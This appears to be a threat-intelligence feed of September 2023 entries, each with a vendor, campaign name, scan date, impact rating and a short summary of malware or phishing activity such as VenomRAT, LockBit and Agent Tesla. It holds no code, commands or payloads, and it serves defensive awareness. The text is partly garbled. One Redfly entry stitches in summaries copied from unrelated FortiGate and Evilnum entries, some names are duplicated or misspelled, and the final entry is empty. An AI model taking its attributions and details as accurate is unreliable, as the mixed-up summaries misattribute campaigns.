- PaloAlto
- Intel Name:
- Fake_WinRAR_PoC_Exploit_Drops_VenomRAT
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have discovered a hacker attempting to infect downloaders with the VenomRAT malware by disseminating a phony proof-of-concept (PoC) exploit for a newly patched WinRAR vulnerability on GitHub.
Source:
https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/
—
- Intel Source:
- Blackberry
- Intel Name:
- Silent_Skimmer_Targeting_APAC_and_NALA_Regions
- Date of Scan:
- 2023-09-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have uncovered a brand-new campaign they’ve called “Silent Skimmer,” in which a financially motivated threat actor preys on weak online payment companies in the APAC and NALA areas. Utilizing flaws, the attacker compromises web servers and gains first access. The final payload uses payment scraping tools to collect consumers’ sensitive financial information from hacked websites.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Chinese_Malware_Emerges_Widely
- Date of Scan:
- 2023-09-20
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have noticed an uptick in activity from particular malware families that target speakers of Chinese. When it comes to cybercrime with a Chinese theme, the recently discovered malware ValleyRAT is emerging, while Sainbox RAT and its related variants have also recently become active.
—
- Intel Source:
- Cert.Pl
- Intel Name:
- DotRunPeX_analysis
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Polish national CERT observed a new malspam campaign targeting Polish users. It all started with this phishing email and initial email was sent from a legitimate employee account of a polish company (using stolen credentials) Also a polish C2 server was used.
Source:
https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/
—
- Intel Source:
- Sophos
- Intel Name:
- Liquidity_mining_scam_activity
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Sophos has observed one liquidity mining scams variant has been growing at a rapid pace – fake. Sophos X-Ops has also seen growth in crypto phishing sites that connect to cryptocurrency wallets while impersonating cryptotrading-related brands in other types of scams, but these sites are often used by sha zhu pan scammers to separate victims from their money.
—
- Intel Source:
- Cyble
- Intel Name:
- Cobalt_Strike_Beacon_delivery
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cyble researchers observed a typosquatted domain of Sophos. That phishing site contains a malware payload embedded within its source code. When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.
Source:
https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/
—
- Intel Source:
- CyberCX
- Intel Name:
- The_multiple_investigation_to_the_Akira_ransomware_group
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- The CyberCX researchers assisted with multiple investigations linked to the Akira ransomware group, which wsa actice for last couple momths. They observed some technique that leverages deployment of ransomware onto Windows Hyper-V hypervisor systems, causing major damage to attached virtual machines (VMs).
—
- Intel Source:
- CISA
- Intel Name:
- Five_malware_samples_backdoors_analysis
- Date of Scan:
- 2023-09-19
- Impact:
- MEDIUM
- Summary:
- CISA obtained five malware samples – related to SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0
—
- Intel Source:
- Cyfirma
- Intel Name:
- RedLine_stealer_new_variant
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cyfirma investigation revealed a new strain of malware that is being distributed under the guise of fake documents or software. It uses multi-level obfuscation to avoid detection and Uses obfuscated PowerShell script as dropper and to execute the malware.
—
- Intel Source:
- Sysdig
- Intel Name:
- A_new_cloud_native_cryptojacking_operation_AMBERSQUID
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team has uncovered a novel cloud-native cryptojacking operation which called AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker.
—
- Intel Source:
- Cyble
- Intel Name:
- The_usage_of_an_open_source_PySilon_RAT_by_multiple_threat_actors
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cyble researchers have observed the usage of an open-source PySilon RAT by multiple threat actors. The current version is using advanced malware capabilities, including its ability to record keystrokes, steal sensitive information, capture screen activity, execute remote commands, and perform additional functions.
Source:
https://cyble.com/blog/emerging-threat-understanding-the-pysilon-discord-rats-versatile-features/
—
- Intel Source:
- Talos
- Intel Name:
- New_HTTPSnoop_malware_targets_telecom_providers
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cisco Talos just discovered a new malware family “HTTPSnoop” being targeted against telecommunications providers in the Middle East. HTTPSnoop is a simple but very effective backdoor that consists of new techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
Source:
https://blog.talosintelligence.com/introducing-shrouded-snooper/
—
- Intel Source:
- Esentire
- Intel Name:
- LockBit_Gang_Attacks_an_MSP_and_Two_Manufacturers
- Date of Scan:
- 2023-09-19
- Impact:
- MEDIUM
- Summary:
- eSentire, one of the top MDR security services provider caught and shut down three separate ransomware attacks launched by LockBit Ransomware Gang. LockBit is one of the most destructive ransomware groups currently operating worldwide. The companies targeted include a storage materials manufacturer, a manufacturer of home décor, and a Managed Service Provider.
—
- Intel Source:
- Cofense
- Intel Name:
- LokiBot_information_stealer
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot has remained in the top five malware families delivered through phishing emails.
Source:
https://cofense2022stg.wpengine.com/blog/lokibot-phishing-malware-baseline/
—
- Intel Source:
- Intel471
- Intel Name:
- Return_of_Bumblebee_Loader_in_New_Campaign
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- Intel471 researchers have discovered a fresh campaign that uses WebDAV (Web Distributed Authoring and Versioning) servers to spread Bumblebee payloads. Threat actors use malicious spam emails to send out Windows shortcut (.LNK) and compressed archive (.ZIP) files that contain.LNK files in this campaign. These LNK files run a preset sequence of commands designed to download Bumblebee malware stored on WebDAV servers when they are triggered by the user.
Source:
https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign
—
- Intel Source:
- Sentilone
- Intel Name:
- A_recent_variant_of_the_Shlayer_malware
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- Sentilone shared about the details of the malware variant and how it can be decoded to reveal the telltale Shlayer signature. Shlayer is the one who the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory.
Source:
https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Lusca_Hackers_Using_Cobalt_Strike
- Date of Scan:
- 2023-09-18
- Impact:
- MEDIUM
- Summary:
- The Linux-based malware, which has been dubbed SprySOCKS due to its quick behavior and SOCKS implementation, has been identified by TrendMicro researchers while keeping track of Earth Lusca. It appears to have come from the open-source Windows backdoor Trochilus.
Source:
https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- 10_most_active_types_of_Turla_malware
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- Palo Alto researchers analyzed the top 10 most recently active types of malware in Pensive Ursa’s arsenal: Capibar, Kazuar, Snake, Kopiluwak, QUIETCANARY/Tunnus, Crutch, ComRAT, Carbon, HyperStack and TinyTurla. MITRE has described Turla as being “known for their targeted intrusions and innovative stealth.”
Source:
https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- A_new_malicious_LNK_file_activity
- Date of Scan:
- 2023-09-16
- Impact:
- LOW
- Summary:
- The Deep Instinct Threat Lab has discovered a new operation against Azerbaijanian targets. The operation has at least two different initial access vectors. The operation is not associated with a known threat actor; the operation was instead named because of their novel malware written in the Rust programming language
—
- Intel Source:
- Cyble
- Intel Name:
- Python_malware_activity_campaigns
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Cyble researchers discovered Python malware capturing screenshots and sending them over FTP to remote attackers. They also observed similar campaigns in the recent past targeting the United States and Germany, with the perpetrator tracked as “TA866”. This campaign involves the execution of PowerShell script, which is responsible for taking screenshots and uploading them to a remote FTP server.
Source:
https://cyble.com/blog/tatar-language-users-in-the-crosshairs-of-python-screenshotter/
—
- Intel Source:
- Microsoft
- Intel Name:
- Attacks_on_Defense_Organizations_by_Iranian_Hackers
- Date of Scan:
- 2023-09-15
- Impact:
- MEDIUM
- Summary:
- Since February 2023, Microsoft researchers have seen that a threat group supported by Iran has been conducting password spray attacks against hundreds of businesses in the United States and around the world. Additionally, a small number of victims in the pharmaceutical, satellite, and defense industries had their sensitive data stolen by state hackers.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- BatLoader_malware_used_in_malicious_campaign
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Malwarebytes researchers saw the same malicious ad whenever they searched for Webex. A new malvertising campaign is targeting corporate users who are downloading the popular web conferencing software Webex.
—
- Intel Source:
- Security Affairs
- Intel Name:
- Free_download_manager_served_Linux_malware
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky observed a free download manager site that has been hacked to inject Linux malware. The experts discovered during their research the domain was compromised had a deb.fdmpkg[.]org subdomain.
Source:
https://securityaffairs.com/150851/malware/free-download-manager-supply-chain-attack.html?amp=1
—
- Intel Source:
- Retool
- Intel Name:
- Unauthorized_access_to_Cloud_accounts
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Lately, Retool told their 27 cloud customers that there had been unauthorized access to their accounts. The attacker was able to navigate through multiple layers of security controls after taking advantage of one of our employees through a SMS-based phishing attack.
—
- Intel Source:
- Netscope
- Intel Name:
- New_Python_NodeStealer_campaign
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Netskope Threat Labs is monitoring a campaign that uses malicious Python scripts to steal Facebook business users’ credentials and browser data. This campaign aims accounts with bogus Facebook messages with a malicious file attached. The attacks are targeted victims in general in Southern Europe and North America.
—
- Intel Source:
- Sucuri
- Intel Name:
- Credit_card_theft_malware
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- During their website cleanup of a compromised Magento ecommerce website, Sucuri analysts caught something that triggered their attention: Credit card theft malware that was concealed through a single, invisible pixel. So analysts in their post shared how they explored how the attackers were able to use a single hidden pixel as a red herring to conceal a broader infection on a checkout page and review a collection of other similar Magecart attacks.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_MidgeDropper_dropper
- Date of Scan:
- 2023-09-14
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs discoverd a new dropper variant called MidgeDropper. They analyzed it, this dropper made an interesting case study for them. The affected platforms are Windows and potential impact is to deploy additional malware for additional purposes
Source:
https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
—
- Intel Source:
- Group-IB
- Intel Name:
- W3LL_Behind_Phishing_Attack_on_Microsoft_365_Business
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- A custom phishing kit called W3LL Panel that is made to get around MFA and 16 other completely customized tools for business email compromise (BEC) attacks were available for purchase on the threat actor’s secret underground market, W3LL Store, which catered to a closed community of at least 500 other threat actors.
Source:
https://go.group-ib.com/hubfs/report/group-ib-w3ll-done-threat-report-2023.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- Scams_Targeting_Windows_Action_Center_Notifications
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- Zscaler researchers have recently noticed an increase in tech support scams, with a particular emphasis on the exploitation of Windows Action Center notifications to provide consumers with false warning warnings. While fake Windows Defender notifications used to make up the majority of tech-support scams, scammers have since expanded their repertoire to include phony websites pretending to be those of McAfee and Avast, among other security companies.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Vidar_Malware_is_Back_to_Compromise_PEC_Mails
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- A new, large-scale malware campaign that targets other PEC emails and is distributed through a number of previously compromised Certified Email accounts is discovered and stopped by CERT-AGID with the assistance of the affected PEC Managers.
Source:
https://cert-agid.gov.it/news/il-malware-vidar-torna-ad-insidiare-le-caselle-pec/
—
- Intel Source:
- TrendMicro
- Intel Name:
- RedLine_Vidar_Using_EV_Certificates_and_Switches_to_Ransomware
- Date of Scan:
- 2023-09-13
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have discovered that the threat actors behind RedLine and Vidar are now disseminating ransomware payloads using the same delivery methods they employ to disseminate info stealers. By making their approaches versatile, the threat actors may be streamlining their activities. They looked into an instance where the victim had initially been exposed to information-stealing malware that had been signed using Extended Validation (EV) code signing certificates. But eventually, they began getting ransomware payloads over the same channel.
Source:
https://www.trendmicro.com/en_us/research/23/i/redline-vidar-first-abuses-ev-certificates.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analyzing_a_Suspected_Remcos_Malware_Attack_on_Colombian_Firms
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- Researchers from Check Point have discovered a brand-new, extensive phishing effort that recently targeted more than 40 eminent businesses in Colombia across a variety of industries. The goal of the attackers is to covertly set up the infamous “Remcos” malware on the PCs of its victims. Remcos is an advanced “Swiss Army Knife” RAT that gives hackers complete control over the infected computer and may be used in a variety of assaults. Data theft, subsequent infections, and account takeover are common effects of a Remcos infection.
—
- Intel Source:
- Symantec
- Intel Name:
- A_Failed_LockBit_Attack_Replaced_at_3AM_Ransomware
- Date of Scan:
- 2023-09-13
- Impact:
- HIGH
- Summary:
- A brand-new ransomware family going by the name of 3AM has appeared. It is employed in a single attack by a ransomware affiliate that tried to install LockBit on a target’s network but switched to 3AM after LockBit was blocked, according to Symantec researchers. The Rust-written malware family 3AM appears to be a brand-new malware family. Before it starts encrypting files, the ransomware makes many attempts to shut down different services on the affected machine. After encryption is finished, Volume Shadow (VSS) copies are tried to be deleted. It is currently unknown if its creators have any connections to recognized cybercrime organizations.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
—
- Intel Source:
- Zscaler
- Intel Name:
- A_Look_at_APT36_Modernized_Weaponry
- Date of Scan:
- 2023-09-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler have found new malicious activities being carried out by the Pakistan-based advanced persistent threat group (APT36) that are intended to attack both Windows and Linux operating systems.
Source:
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Delivering_RATs_and_Stealers_via_Updated_DBatLoader
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- Researchers from IBM X-Force have discovered new features in DBatLoader malware samples distributed in recent email campaigns, indicating a higher risk of infection from common malware families linked to DBatLoader activities. Additionally, since late June, they have seen close to 20 email campaigns that send payloads including Remcos, Warzone, Formbook, and AgentTesla using the new DBatLoader loader.
—
- Intel Source:
- Securelist
- Intel Name:
- Potential_Supply_Chain_Attack_Against_Linux_Machines
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Securelist have examined the samples that are targeting Linux systems. When they made the decision to look into a group of suspicious domains, they came across one such persistent attack.
Source:
https://securelist.com/backdoored-free-download-manager-linux-malware/110465/
—
- Intel Source:
- Threatfabric
- Intel Name:
- Andromeda_latest_malware
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- ThreatFabric analysts observed a new malware family called Andromeda. The name comes from the URLs of the C2 servers used to create Remote Access sessions. Plus on the top of this malicious activity from threat actors focused on the country’s traditional banking ecosystem, increased targeting of more modern financial services technologies has also been observed.
Source:
https://www.threatfabric.com/blogs/andromeda-the-latest-brazilian-dto-malware-0
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_MetaStealer_Malware_Targeting_macOS_Users
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- Researchers at SentinelOne have seen attackers using the malware, which is known as MetaStealer, to target Mac users across a variety of industries in an effort to infiltrate corporate networks. The MetaStealer malware is typically concealed in malicious documents or files, occasionally in files that have been made to resemble Adobe software or files.
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Word_Document_Spreads_OriginBotnet
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- Researchers at FortiGate have discovered a sophisticated phishing effort that employs a Microsoft Word document lure to disseminate a trio of threats—Agent Tesla, OriginBotnet, and OriginBotnet—in order to collect a variety of data from infected Windows devices.
Source:
https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document
—
- Intel Source:
- Cyber Threat Ivtelligence Network
- Intel Name:
- A_new_Evilnum_campaign
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- CTIN has observed a new campaign that is associated with previous malicious one connected to Evilnum. EvilNum is a threat group that is characterized by an evolving toolkit and sector-specific and geographic-specific targeting. The reserachers made deep technical analysis on observations between 2018 and 2020. More recently CyberReason has described one of their newest tools called PyVil Remote Access Trojan (RAT).
Source:
https://cyberthreatintelligencenetwork.com/index.php/2023/09/08/potential-new-evilnum-campaign/
—
- Intel Source:
- Symantec
- Intel Name:
- Espionage_Actors_target_critical_infrastructure
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
-
Researchers from Symantec have discovered evidence that a threat actor organization they refer to as Redfly used the ShadowPad Trojan to hack a national grid in an Asian nation for as long as six months earlier this year. Multiple computers on the organization’s network were compromised, and the attackers were successful in stealing credentials.
Researchers at FortiGate have discovered a sophisticated phishing effort that employs a Microsoft Word document lure to disseminate a trio of threats—Agent Tesla, OriginBotnet, and OriginBotnet—in order to collect a variety of data from infected Windows devices.
CTIN has observed a new campaign that is associated with previous malicious one connected to Evilnum. EvilNum is a threat group that is characterized by an evolving toolkit and sector-specific and geographic-specific targeting. The reserachers made deep technical analysis on observations between 2018 and 2020. More recently CyberReason has described one of their newest tools called PyVil Remote Access Trojan (RAT).
Symantec’s Threat Hunter Team has discovered evidence that a threat actor group Symantec calls Redfly used the ShadowPad Trojan to compromise a national grid in an Asian country for as long as six months earlier this year. The attackers managed to steal credentials and compromise multiple computers on the organization’s network.
Source:
https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks
—
- Intel Source:
- Symantec
- Intel Name:
- Redfly_APT_Group_Targating_Critical_Infrastructure
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have discovered evidence that a threat actor organization they refer to as Redfly used the ShadowPad Trojan to hack a national grid in an Asian nation for as long as six months earlier this year. Multiple computers on the organization’s network were compromised, and the attackers were successful in stealing credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Introducing_Charming_Kitten_New_Backdoor_Sponsor
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- Researchers from ESET have discovered that the Iranian threat actor Charming Kitten is connected to a recent round of attacks that target various targets in Brazil, Israel, and the United Arab Emirates using a hidden Ballistic Bobcat backdoor they have dubbed Sponsor. Victimology patterns suggest that the group primarily singles out education, government, and healthcare organizations, as well as human rights activists and journalists.
—
- Intel Source:
- Security Affairs
- Intel Name:
- The_brute_force_attacks_targeting_Cisco_ASA
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Security Affairs researchers shared in their blog that Cisco has observed that Akira ransomware threat actors have been targeting Cisco VPNs that are not configured for multi-factor authentication to infiltrate organizations, and they have discovered instances where threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.
Source:
https://securityaffairs.com/150157/cyber-crime/cisco-asa-ransomware-attacks.html
—
- Intel Source:
- Truesec
- Intel Name:
- DarkGate_Loader_Malware_Leveraging_Microsoft_Teams
- Date of Scan:
- 2023-09-11
- Impact:
- MEDIUM
- Summary:
- The DarkGate Loader virus is delivered by a Microsoft Teams malware campaign, which the Truesec Cybersecurity Team has looked into. Microsoft Teams chat messages are delivered from two external Office 365 accounts that had been compromised before the campaign on August 29 between the hours of 11:25 and 12:25 UTC. The purpose of the message’s content is to trick its recipients into downloading and running a malicious file that is hosted remotely.
Source:
https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams
—
- Intel Source:
- McAfee
- Intel Name:
- Agent_Tesla_Delivering_via_VBScript
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Researchers from McAfee have discovered a version where Agent Tesla is disseminating via VBScript (VBS) files, deviating from its typical dissemination techniques. VBS files are script files that are used in Windows to automate operations, configure computers, and carry out different activities. Cybercriminals may also make advantage of them to spread malicious software and carry out damaging operations on computers.
—
- Intel Source:
- Zscaler
- Intel Name:
- Technical_Investigation_of_HijackLoader
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have noticed a new malware loader known as HijackLoader is becoming more popular among cybercriminals for distributing different payloads like DanaBot, SystemBC, and RedLine Stealer. HijackLoader employs a modular architecture, a trait that most loaders lack, therefore even if it lacks advanced functionality, it may leverage a number of modules for code injection and execution.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader
—
- Intel Source:
- Securelist
- Intel Name:
- An_Analysis_of_Cuba_Ransomware
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Researchers from Securelist have examined the Cuba ransomware. They initially became aware of the group’s offensives in late 2020. The name “Cuba” had not yet been given to the cyberterrorists; instead, they were known as “Tropical Scorpius” at the time. Organizations in the US, Canada, and Europe are the target of this. The gang has carried out a slew of impactful attacks against financial institutions, healthcare organizations, government organizations, and oil industries.
—
- Intel Source:
- ASEC
- Intel Name:
- Attacks_by_APT_Using_BlueShell_on_Korean_and_Thai_Targets
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- A backdoor called BlueShell is created in Go. It is accessible via GitHub and works with Windows, Linux, and Mac OS. Although it appears that the original GitHub repository has been removed, additional repositories still offer access to the BlueShell source code. Notably, the ReadMe file that contains the instructions is in Chinese, which raises the possibility that the author is a Chinese speaker.
—
- Intel Source:
- Checkmarx
- Intel Name:
- A_Comprehensive_Analysis_of_70_Layers_of_Info_Stealing_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx have examined an intriguing sample that is covered in numerous obfuscation layers. These packages are quite difficult. The attackers have not yet understood that their aims cannot be concealed by any amount of obfuscation.
Source:
https://checkmarx.com/blog/a-deep-dive-into-70-layers-of-obfuscated-info-stealer-malware/
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Campaign_Disguises_Emails_as_PDF_Viewer_Screens
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- AhnLab’s Security Emergency Response Center (ASEC) has uncovered a phishing campaign distributing malicious script files posing as PDF document viewer screens. These emails contain filenames related to purchase orders and receipts to lure recipients. When opened, the attachment prompts users to enter their email passwords to access the document, displaying varying messages based on login attempts. After three tries, users are redirected to a legitimate PDF to mask the phishing attempt. The script can also send user data via Telegram for anonymity
—
- Intel Source:
- CISA
- Intel Name:
- Multiple_APT_Groups_Exploiting_CVE_2022_47966_and_CVE_2022_42475
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA have discovered signs of compromise (IOCs) as early as January 2023 at a company in the aerospace sector. The CVE-2022-47966 vulnerability was taken advantage of by nation-state advanced persistent threat (APT) actors to access a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move lateral through the network. The ManageEngine program is vulnerable and permits remote code execution. Other APT actors were seen making a presence on the company’s firewall device by using CVE-2022-42475 as a means of attack.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- New_Hive0117_Phishing_Campaign_Delivering_DarkWatchman_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- IBM X-Force researchers have discovered a new phishing attack, probably launched by Hive0117, that targeted individuals working in the main Russian, Kazakh, Latvian, and Estonian energy, banking, transportation, and software security sectors.
—
- Intel Source:
- Google Blog
- Intel Name:
- Another_Attack_on_Security_Researchers_by_North_Korean_Hackers
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
- Summary:
- In January 2021, Google made the initial discovery that DPRK attackers weren’t targeting innocent, defenseless people or organizations, but rather the cybersecurity experts themselves. The attackers have returned, this time armed with a brand-new zero-day vulnerability, a fake software tool, and a stunningly broad phishing campaign.
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_phishing_attack_using_Google_Looker_Studio
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- In their report, Check Point Harmony researchers are discussing how hackers are using social engineering with a Google domain, designed to elicit a user response and hand over credentials to crypto sites. In this attack, hackers are utilizing Google Looker Studio to host credential harvesting crypto sites.
Source:
https://blog.checkpoint.com/security/phishing-via-google-looker-studio/
—
- Intel Source:
- Gteltsc
- Intel Name:
- Advanced_Attack_Groups_JavaScript_RATs_and_APT_Ransomware
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
- Summary:
- This article highlights Chimera Group targeting semiconductor and aerospace industries, a JavaScript RAT campaign in Asian government institutions, the Solorigate campaign’s transition, Chinese APT groups turning to ransomware, and the PLEASE_READ_ME ransomware campaign targeting MySQL servers.
Source:
https://gteltsc.vn/blog/thong-tin-cac-moi-de-doa-bao-mat-trong-thang-01-2021-9681.html
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_CHM_Malware_Using_the_Topic_of_Fukushima_Wastewater_Release
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company” covered in March of this year and also uses the same commands used in the “2.3. Persistence” stage in the attack process of the RedEyes group’s M2RAT malware.
—
- Intel Source:
- Esentire
- Intel Name:
- Fake_Browser_Updates_Distribute_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- Recently threat response unit researchers has discovered some evidence of cases related to LummaC2 across multiple industries. LummaC2 is an information stealer distributed as a Malware-as-a-Service (MaaS) offering on Russian-language forums. The reserachers suspect that it also has the ability to load additional malware onto the system. In a recent case in August, a user became infected with LummaC2, Amadey, and PrivateLoader after running a fake Chrome browser update.
—
- Intel Source:
- Flashpoint
- Intel Name:
- Return_of_RisePro_Stealer_With_New_Updates
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- The RisePro thief made a comeback in July, according to its supplier, who claims that this new and enhanced version will provide clients with a better experience after going dark for almost seven months.
Source:
https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
—
- Intel Source:
- Fortinet
- Intel Name:
- Spreading_New_Agent_Tesla_Variant_through_Excel_Document
- Date of Scan:
- 2023-09-07
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered a phishing campaign spreading a new Agent Tesla variant. To obtain initial access, this well-known malware family uses a data stealer and.Net-based Remote Access Trojan (RAT). For Malware-as-a-Service (MaaS), it is frequently utilized. When this campaign was thoroughly examined, everything from the initial phishing email to the acts of Agent Tesla installed on the victim’s computer to the gathering of personal data from the harmed device was discovered.
Source:
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_emails_abusing_another_Cloudflare_service
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- Trustwave is seeing a lot of phishing emails with URLs abusing another Cloudflare service which is r2.dev. The subjects of the phishing emails contain alarming or common keywords like statement paid, upgrade mail, purchase order, etc.
—
- Intel Source:
- Talos
- Intel Name:
- Cybercriminals_are_abusing_Advanced_Installer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- Talos observed an ongoing cryptocurrency mining campaign that sends malicious payloads by abusing the tool Advanced Installer. This is a legitimate tool designed to create software packages for Windows. The software installers targeted in this campaign are specifically used for 3-D modeling and graphic design.
Source:
https://blog.talosintelligence.com/cybercriminals-target-graphic-designers-with-gpu-miners/
—
- Intel Source:
- Seqrite
- Intel Name:
- New_Warp_Malware_Dropping_Modified_Stealerium_Infostealer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- In order to address certain demands and vulnerabilities, cybercriminals started marketing and disseminating several stealthy malware variants. Stealer malware today, such the “Warp Stealer,” is quite advanced and versatile. From infected PCs, they can collect useful data such as hardware specifications, network setups, browser history, and private information pertaining to finances and online activities.
Source:
https://www.seqrite.com/blog/new-warp-malware-drops-modified-stealerium-infostealer/
—
- Intel Source:
- Sysdig
- Intel Name:
- In_depth_analysis_of_Scarleteel_2_threat
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- In Sysdig post, their analysts provided a full detailed report about cyber attack that reverberated across the digital realm – SCARLETEEL. In their analysis this serious incident using the MITRE ATT&CK framework, where analysts are providing deep insights into the operational tactics of cyber adversaries.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Mac_users_targeted_in_new_malvertising_campaign_delivering_Atomic_Stealer
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
- AMOS was first promoted as a Mac OS stealer with a strong focus on crypto assets in April 2023. It also included a file grabber and the ability to harvest passwords from browsers and Apple’s keychain. A new version of the project was released at the end of June as a result of the developer’s active work on it.
—
- Intel Source:
- Zscaler
- Intel Name:
- An_Examination_of_a_New_Stealing_Campaign
- Date of Scan:
- 2023-09-07
- Impact:
- LOW
- Summary:
